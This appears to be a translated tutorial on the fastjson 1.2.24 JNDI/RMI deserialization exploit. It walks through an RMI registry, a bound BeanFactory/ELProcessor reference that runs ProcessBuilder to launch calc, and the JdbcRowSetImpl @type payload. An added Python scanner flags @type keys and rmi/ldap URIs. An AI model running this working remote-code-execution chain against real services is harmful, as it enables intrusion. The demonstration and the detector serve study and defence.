1. Program 1 starts the RMI registry service
System.out.println("Creating evil RMI registry on port 1111");
LocateRegistry.createRegistry(1111);
System.out.println("======启动Rmi成功!======");
Thread.currentThread().join();
2. Program 2 binds a service in the RMI registry
ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "", true,"org.apache.naming.factory.BeanFactory",null);
ref.add(new StringRefAddr("forceString", "x=eval"));
ref.add(new StringRefAddr("x", "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['calc']).start()\")"));
ReferenceWrapper referenceWrapper = new ReferenceWrapper(ref);
Naming.bind("rmi://127.0.0.1:1111/service1", referenceWrapper);
System.out.println("RMI服务启动成功,服务地址:" + "rmi://127.0.0.1:1111/service1");
3. In program 3, fastjson deserialization resolves the RMI service and executes the object that was registered there
<fastjson.version>1.2.24</fastjson.version>
String json="{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://127.0.0.1:1111/service1\",\"autoCommit\":true}";
JSON.parseObject(json);
4. fastjson's parseObject method ends up performing a JNDI lookup, similar to this.registry.lookup("rmi://127.0.0.1:1111/service1");. That lookup is what triggers execution of the remote object, so the vulnerability is exploited.
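A defensive check for the trigger described in steps 3 and 4, added here as an example and not part of the original page: it inspects a request body before it is handed to fastjson and flags the auto-type marker `@type` and any string value that is a JNDI-resolvable URI (rmi:, ldap:, and similar). It goes beyond the single flat payload in step 3 by walking nested objects and arrays. The scheme list, the function names and the benign sample input are assumptions constructed for this example; the one suspicious sample is the JSON string from step 3.

```python
import json
from urllib.parse import urlsplit

# URI schemes that JNDI can resolve. A JSON-to-bean deserializer should never be
# allowed to hand one of these to a lookup. (Assumed list for this example.)
JNDI_SCHEMES = {"rmi", "ldap", "ldaps", "iiop", "corbaname", "dns"}


def _walk(node, path=""):
    """Yield (path, key, value) for every key/value pair in a nested JSON document."""
    if isinstance(node, dict):
        for key, value in node.items():
            child = f"{path}.{key}" if path else key
            yield child, key, value
            yield from _walk(value, child)
    elif isinstance(node, list):
        for index, value in enumerate(node):
            yield from _walk(value, f"{path}[{index}]")


def scan_fastjson_payload(text):
    """Return a list of (finding, json_path, value) tuples for a request body.

    An empty list means nothing looked like an auto-type or JNDI trigger.
    """
    findings = []
    try:
        doc = json.loads(text)
    except ValueError:
        # A body that is not JSON cannot be parsed by fastjson either, but
        # report it so the caller does not silently pass it through.
        return [("unparseable", "", text[:40])]

    for path, key, value in _walk(doc):
        # fastjson's "@type" key asks the parser to instantiate an arbitrary class.
        if key == "@type":
            findings.append(("autotype", path, str(value)))
        # Any string that is a JNDI-capable URI could reach a lookup via a setter.
        if isinstance(value, str) and urlsplit(value).scheme.lower() in JNDI_SCHEMES:
            findings.append(("jndi-uri", path, value))
    return findings


def is_suspicious(text):
    """True when the body should be rejected before fastjson sees it."""
    return bool(scan_fastjson_payload(text))


if __name__ == "__main__":
    # Constructed sample inputs: the payload from step 3 and a benign document.
    samples = [
        '{"@type":"com.sun.rowset.JdbcRowSetImpl",'
        '"dataSourceName":"rmi://127.0.0.1:1111/service1","autoCommit":true}',
        '{"name":"alice","homepage":"https://example.com","tags":["a","b"]}',
    ]
    for body in samples:
        print(is_suspicious(body), scan_fastjson_payload(body))
```

The check is meant to sit in front of the parser (a servlet filter or gateway rule), not replace upgrading fastjson: it rejects the shape of input that reaches the JNDI lookup rather than relying on the parser to refuse the class.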